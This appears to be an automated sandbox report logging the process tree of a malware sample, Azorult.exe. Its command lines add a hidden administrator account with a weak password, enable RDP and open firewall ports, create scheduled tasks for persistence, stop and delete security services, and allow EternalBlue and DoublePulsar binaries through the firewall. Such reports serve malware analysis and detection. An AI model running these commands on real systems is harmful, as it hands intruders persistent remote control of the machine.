  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3388 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12196 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1788
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Chimera
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:6236
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:6588
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      PID:6852
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:7024
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:7116
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:7120
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:7064
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5384
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1052
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3500
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:1444
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:920
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:6612
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:5920
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:6344
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Blocklisted process makes network request
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5892
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3936
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:6648
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6812
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:6352
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7036
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:5012
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:5472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        
        PID:7296
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5252
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:10172
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:8536
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:7568
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        
        PID:11092
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:8820
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:7932
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:9796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:7608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:6872
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:10056
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:8004
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:10596
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:7928
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:9276
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:9344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:7984
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:8308
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:10540
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:9604
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:8916
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:9148
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:10228
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:7812
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:10680
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:10744
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:10760
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        
        PID:10952
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        
        PID:9400
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:7852
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:7416
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:8308
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F64.tmp\5F65.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:5168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3396
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious use of SetWindowsHookEx
        
        PID:9244
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10680
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:11172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:7712
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:8272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:3416
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:8096
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10376
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:10904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:7436
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:8084
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:7240
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:9740
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:9624
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:7572
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:6648
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:5092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:4460
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:6808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6844
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:5936
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:6612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:5920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6344
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:7024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6852
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:5688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:3112
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:5212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:4008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:7064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:2392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:7024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:5044
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:4848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:1052
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:6092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:4404
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:5360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:7128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4412
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:6868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:6964
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:232
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:4628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5520
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:7656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:5724
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:7936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:6388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:7916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:6684
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:7900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:7068
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:7092
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:8072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:5156
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:668
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5760
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:6452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:6704
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:7052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:4140
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:7280
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:7404
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:7500
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:7660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:7688
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7788
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:9848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7876
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:10168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:7972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6516
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8080
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:4344
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
